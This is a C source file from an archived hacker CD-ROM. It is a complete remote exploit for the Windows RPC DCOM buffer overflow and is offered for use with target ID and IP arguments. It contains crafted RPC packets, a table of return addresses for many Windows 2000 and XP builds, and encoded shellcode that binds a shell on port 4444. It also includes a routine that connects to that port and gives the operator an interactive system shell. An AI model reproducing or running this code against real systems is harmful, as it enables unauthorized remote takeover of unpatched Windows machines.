home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 12 / hacker12 / 12_HACKER_12.ISO / exploits / poc / Poc.c
Encoding:
C/C++ Source or Header  |  2003-08-19  |  14.6 KB  |  369 lines
  1. /*
  2. ++ 
  3. ++ Windows RPC DCOM (POC)
  4. ++ 
  5. ++ Thanks to LSD and xfocus
  6. ++ 
  7. ++ Shouts to Team Teso + KASBIT 
  8. ++ 
  9. ++ POC coded by Sami Anwer Dhillon From Pakistan 
  10. ++ 
  11. ++ Please Dont rip The code 
  12. */
  13.  
  14. #include <stdio.h>
  15. #include <stdlib.h>
  16. #include <sys/types.h>
  17. #include <sys/socket.h>
  18. #include <netinet/in.h>
  19. #include <arpa/inet.h>
  20. #include <unistd.h>
  21. #include <netdb.h>
  22. #include <fcntl.h>
  23. #include <unistd.h>
  24.  
  25. unsigned char bindstr[]={
  26. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
  27. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
  28. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
  29. 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
  30. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
  31.  
  32. unsigned char request1[]={
  33. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
  34. ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
  35. ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
  36. ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
  37. ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
  38. ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
  39. ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
  40. ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
  41. ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
  42. ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  43. ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  44. ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
  45. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
  46. ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
  47. ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  48. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
  49. ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
  50. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
  51. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
  52. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
  53. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
  54. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
  55. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
  56. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
  57. ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
  58. ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
  59. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
  60. ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  61. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  62. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  63. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  64. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
  65. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
  66. ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
  67. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
  68. ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
  69. ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
  70. ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
  71. ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  72. ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
  73. ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
  74. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
  75. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
  76. ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
  77. ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
  78. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  79. ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
  80. ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
  81. ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  82. ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
  83. ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
  84. ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  85. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
  86. ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
  87. ,0x00,0x00,0x00,0x00,0x00,0x00};
  88.  
  89. unsigned char request2[]={
  90. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
  91. ,0x00,0x00,0x5C,0x00,0x5C,0x00};
  92.  
  93. unsigned char request3[]={
  94. 0x5C,0x00
  95. ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
  96. ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  97. ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  98. ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  99.  
  100. unsigned char *targets [] =
  101.         {
  102. "Windows 2000 all (english)",
  103. "Windows XP all (english)",
  104. "Windows 2000-nosp 1  (English)",
  105. "Windows 2000-nosp 2  (English)",
  106. "Windows 2000+sp1 1   (English)", 
  107. "Windows 2000+sp2 1   (English)",
  108. "Windows 2000+sp2 2   (English)",
  109. "Windows 2000+sp3 1   (English)",
  110. "Windows 2000+sp3 2   (English)",
  111. "Windows 2000+sp4 1   (English)",
  112. "Windows XP+nosp  1   (English)",
  113. "Windows XP+sp1 1     (English)",
  114. "Windows XP+sp1 2     (English)",
  115. "Windows XP+sp2 1     (English)",
  116. "Windows 2000+nosp    (Polish)",
  117. "Windows 2000+sp3     (Polish)",
  118. "Windows 2000+sp4     (Spanish)",
  119. "Windows 2000+sp3     (China)",
  120. "Windows 2000+sp4     (China)",
  121. "Windows 2000+sp3     (German)",
  122.             NULL                       
  123.                                                                  
  124.         };
  125.         
  126. unsigned long offsets [] = 
  127.         {
  128. 0x010016C6,
  129. 0x0100139d,
  130. 0x77e81674,          
  131. 0x77e33f6d,    
  132. 0x77e829ec,      
  133. 0x77e2492b,     
  134. 0x77e824b5,     
  135. 0x77e8367a,    
  136. 0x772efa5c,      
  137. 0x77f92a9b,      
  138. 0x77e9afe3,     
  139. 0x77e626ba,     
  140. 0x77d737db,     
  141. 0x777d73bd,     
  142. 0x77e33f4d,     
  143. 0x77e42c29,     
  144. 0x77a53b13,     
  145. 0x41424344,     
  146. 0x77df4c29,     
  147. 0x772e887a,     
  148.      };
  149.  
  150. unsigned char sc[]=
  151.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
  152.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
  153.     "\x46\x00\x58\x00\x46\x00\x58\x00"
  154.  
  155.     "\xff\xff\xff\xff" /* return address */
  156.     
  157.     "\xcc\xe0\xfd\x7f" /* primary thread data block */
  158.     "\xcc\xe0\xfd\x7f" /* primary thread data block */
  159.  
  160.     /* port 4444 bindshell */
  161.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  162.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  163.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  164.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  165.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  166.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  167.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  168.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  169.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  170.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  171.     "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
  172.     "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
  173.     "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
  174.     "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
  175.     "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
  176.     "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
  177.     "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
  178.     "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
  179.     "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
  180.     "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
  181.     "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
  182.     "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
  183.     "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
  184.     "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
  185.     "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
  186.     "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
  187.     "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
  188.     "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
  189.     "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
  190.     "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
  191.     "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
  192.     "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
  193.     "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
  194.     "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
  195.     "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
  196.     "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
  197.     "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
  198.     "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
  199.     "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
  200.     "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
  201.     "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
  202.     "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
  203.  
  204.    
  205.  
  206. unsigned char request4[]={
  207. 0x01,0x10
  208. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
  209. ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
  210. ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  211. };
  212.  
  213.  
  214. /* ripped from TESO code */
  215. void shell (int sock)
  216. {
  217.         int     l;
  218.         char    buf[512];
  219.         fd_set  rfds;
  220.  
  221.  
  222.         while (1) {
  223.                 FD_SET (0, &rfds);
  224.                 FD_SET (sock, &rfds);
  225.  
  226.                 select (sock + 1, &rfds, NULL, NULL, NULL);
  227.                 if (FD_ISSET (0, &rfds)) {
  228.                         l = read (0, buf, sizeof (buf));
  229.                         if (l <= 0) {
  230.                                 printf("\n - Connection closed by local user\n");
  231.                                 exit (EXIT_FAILURE);
  232.                         }
  233.                         write (sock, buf, l);
  234.                 }
  235.  
  236.                 if (FD_ISSET (sock, &rfds)) {
  237.                         l = read (sock, buf, sizeof (buf));
  238.                         if (l == 0) {
  239.                                 printf ("\n - Connection closed by remote host.\n");
  240.                                 exit (EXIT_FAILURE);
  241.                         } else if (l < 0) {
  242.                                 printf ("\n - Read failure\n");
  243.                                 exit (EXIT_FAILURE);
  244.                         }
  245.                         write (1, buf, l);
  246.                 }
  247.         }
  248. }
  249.  
  250.  
  251. int main(int argc, char **argv)
  252. {
  253.     
  254.     int sock;
  255.     int len,len1;
  256.     unsigned int target_id;
  257.     unsigned long ret;
  258.     struct sockaddr_in target_ip;
  259.     unsigned short port = 135;
  260.     unsigned char buf1[0x1000];
  261.     unsigned char buf2[0x1000];
  262.  
  263.     printf("---------------------------------------------------------\n");
  264.     printf("- Universal Remote DCOM RPC Buffer Overflow Exploit\n");
  265.     printf("- By Sami Anwer Dhillon From Pakistan  \n");
  266.  
  267.     if(argc<3)
  268.     {
  269.         printf("- Usage: %s <Target ID> <Target IP>\n", argv[0]);
  270.         printf("- Targets:\n");
  271.         for (len=0; targets[len] != NULL; len++)
  272.         {
  273.             printf("-          %d\t%s\n", len, targets[len]);   
  274.         }
  275.         printf("\n");
  276.         exit(1);
  277.     }
  278.  
  279.     /* yeah, get over it :) */
  280.     target_id = atoi(argv[1]);
  281.     ret = offsets[target_id];
  282.     
  283.     printf("- Using return address of 0x%.8x\n", ret);
  284.  
  285.     memcpy(sc+36, (unsigned char *) &ret, 4);
  286.  
  287.     target_ip.sin_family = AF_INET;
  288.     target_ip.sin_addr.s_addr = inet_addr(argv[2]);
  289.     target_ip.sin_port = htons(port);
  290.  
  291.     if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
  292.     {
  293.         perror("- Socket");
  294.         return(0);
  295.     }
  296.     
  297.     if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
  298.     {
  299.         perror("- Connect");
  300.         return(0);
  301.     }
  302.     
  303.     len=sizeof(sc);
  304.     memcpy(buf2,request1,sizeof(request1));
  305.     len1=sizeof(request1);
  306.     
  307.     *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;  
  308.     *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
  309.     
  310.     memcpy(buf2+len1,request2,sizeof(request2));
  311.     len1=len1+sizeof(request2);
  312.     memcpy(buf2+len1,sc,sizeof(sc));
  313.     len1=len1+sizeof(sc);
  314.     memcpy(buf2+len1,request3,sizeof(request3));
  315.     len1=len1+sizeof(request3);
  316.     memcpy(buf2+len1,request4,sizeof(request4));
  317.     len1=len1+sizeof(request4);
  318.     
  319.     *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
  320.     
  321.  
  322.     *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;  
  323.     *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
  324.     *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
  325.     *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
  326.     *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
  327.     *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
  328.     *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
  329.     
  330.     if (send(sock,bindstr,sizeof(bindstr),0)== -1)
  331.     {
  332.             perror("- Send");
  333.             return(0);
  334.     }
  335.     len=recv(sock, buf1, 1000, 0);
  336.     
  337.     if (send(sock,buf2,len1,0)== -1)
  338.     {
  339.             perror("- Send");
  340.             return(0);
  341.     }
  342.     close(sock);
  343.     sleep(1);
  344.     
  345.     target_ip.sin_family = AF_INET;
  346.     target_ip.sin_addr.s_addr = inet_addr(argv[2]);
  347.     target_ip.sin_port = htons(4444);
  348.  
  349.     if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
  350.     {
  351.         perror("- Socket");
  352.         return(0);
  353.     }
  354.     
  355.     if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
  356.     {
  357.         printf("- Exploit appeared to have failed.\n");
  358.         return(0);
  359.     }   
  360.     
  361.     printf("- Dropping to System Shell...\n\n");
  362.  
  363.     shell(sock);
  364.     
  365.     return(0);
  366. }
  367.  
  368.  
  369.